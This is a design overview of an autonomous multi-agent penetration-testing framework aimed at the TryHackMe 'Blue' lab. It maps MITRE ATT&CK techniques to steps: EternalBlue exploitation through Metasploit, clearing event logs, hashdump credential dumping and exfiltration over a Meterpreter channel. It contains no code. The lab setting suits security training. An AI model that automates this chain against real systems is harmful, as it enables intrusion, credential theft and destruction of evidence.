The Pentest Agent System is an autonomous penetration testing framework built on the MITRE ATT&CK framework. It specifically targets the "Blue" challenge on TryHackMe, which involves exploiting the MS17-010 (EternalBlue) vulnerability to gain access to a Windows 7 system and collect flags.
This document provides a comprehensive technical overview of the system architecture, component interaction, and execution flow.
The system follows a multi-agent architecture with three specialized agents:
Purpose: Coordinate the overall operation flow, manage the other agents, and track progress.
Key Responsibilities:
- Initialize the system with configuration parameters
- Manage the planning and execution phases
- Handle pause, resume, and abort operations
- Track and report progress
- Collect and format the final results
Implementation Details:
PentestOrchestratorAgent
class inagents/orchestrator.ts
- Maintains an
OrchestratorState
containing overall operation status - Provides event-based updates on operation progress
- Creates the final operation report
Purpose: Generate an attack plan based on the MITRE ATT&CK framework.
Key Responsibilities:
- Create a structured attack plan with ordered steps
- Map MITRE ATT&CK techniques to specific commands
- Define dependencies between steps
- Generate validation criteria for each step
- Save and load plans from disk
Implementation Details:
MitrePlannerAgent
class inagents/planner.ts
- Uses attack techniques defined in
config/attack_mapping.ts
- Creates
AttackPlan
objects containing orderedPlanStep
items - Each step maps directly to a MITRE ATT&CK technique
Purpose: Execute the attack plan against the target system.
Key Responsibilities:
- Run the plan steps in the correct order
- Interact with external tools (Nmap, Metasploit)
- Handle command execution and error recovery
- Validate step results against expected outcomes
- Generate execution artifacts
Implementation Details:
ExploitExecutorAgent
class inagents/executor.ts
- Uses tool-specific clients (
nmap_client.ts
,metasploit_client.ts
) - Maintains a
PlanExecutionState
tracking progress - Emits events at key execution points
- Collects and stores results and artifacts
The system uses several data models to represent its state:
Core Model: AttackPlan
in models/plan.ts
Represents a complete attack plan with:
- Target information
- Objectives
- Ordered steps
- Dependencies
- Metadata
Core Model: MitreAttackTechnique
in models/mitre.ts
Maps techniques from the MITRE ATT&CK framework with:
- Technique ID (e.g., T1190)
- Name and description
- Tactic category
- Implementation function
- Requirements and provisions
- Detection difficulty
Core Model: OperationResult
in models/result.ts
Stores the outcome of an operation including:
- Scan results (open ports, vulnerabilities)
- Exploit results (success, session info)
- Post-exploitation results (commands, outputs)
- Captured flags
- Summary and statistics
The system follows this execution flow:
-
Initialization:
- Parse command-line arguments
- Load configuration
- Set up logging
- Initialize agents
-
Planning Phase:
- Orchestrator requests a plan from the Planner
- Planner generates steps based on MITRE techniques
- Plan is saved to disk for reference
-
Execution Phase:
- Orchestrator passes the plan to the Executor
- Executor performs reconnaissance (Nmap scan)
- Executor exploits the EternalBlue vulnerability
- Executor performs post-exploitation actions
- Results are collected at each step
-
Result Collection:
- Operation results are compiled
- Flags are verified
- Summary is generated
- Results are saved to disk
This system implements the following specific techniques from the MITRE ATT&CK framework:
- T1046: Network Service Scanning
- Implementation: Nmap scan to identify open ports and services
- Target: Identifying port 445 (SMB) and detecting MS17-010 vulnerability
- T1190: Exploit Public-Facing Application
- Implementation: MS17-010 (EternalBlue) exploit via Metasploit
- Target: SMB service on port 445
- T1059: Command and Scripting Interpreter
- Implementation: Command execution via Meterpreter session
- Target: Windows command shell
- T1068: Exploitation for Privilege Escalation
- Implementation: EternalBlue exploit typically provides SYSTEM privileges
- Target: Obtaining highest level privileges on the system
- T1070: Indicator Removal on Host
- Implementation: Clearing event logs via Meterpreter
- Target: Windows event logs
- T1003: OS Credential Dumping
- Implementation: Hashdump via Meterpreter
- Target: SAM database with user credentials
- T1083: File and Directory Discovery
- Implementation: File search via Meterpreter
- Target: Locating flag files in the system
- T1005: Data from Local System
- Implementation: File retrieval via Meterpreter
- Target: Flag files at known locations
- T1041: Exfiltration Over C2 Channel
- Implementation: Data transfer via established Meterpreter session
- Target: Flag content extraction
The system integrates with these external tools:
- Used for reconnaissance
- Implemented via
NmapClient
inutils/nmap_client.ts
- Performs vulnerability scanning with scripts including
smb-vuln-ms17-010
- Used for exploitation and post-exploitation
- Implemented via
MetasploitClient
inutils/metasploit_client.ts
- Executes the EternalBlue exploit module
- Manages Meterpreter sessions for post-exploitation
The system implements several error handling mechanisms:
- Step-level retries: Failed steps can be retried multiple times
- Fallback commands: Alternative commands can be executed if primary commands fail
- Non-critical step failures: System can continue execution even if non-critical steps fail
- Timeout handling: Commands have configurable timeouts
- Exception catching: All external tool interactions are wrapped in try/catch blocks
- Graceful abortion: Operation can be safely aborted at any point
Potential areas for improvement include:
- Expanded technique coverage: Implementing additional MITRE ATT&CK techniques
- Additional tool integration: Supporting more security tools beyond Nmap and Metasploit
- Machine learning components: Adding ML for adaptive attack planning
- Distributed architecture: Supporting multi-agent operations across multiple systems
- Enhanced visualization: Adding real-time visualization of the attack progress
- Network-based flag submission: Automatic submission of flags to validation systems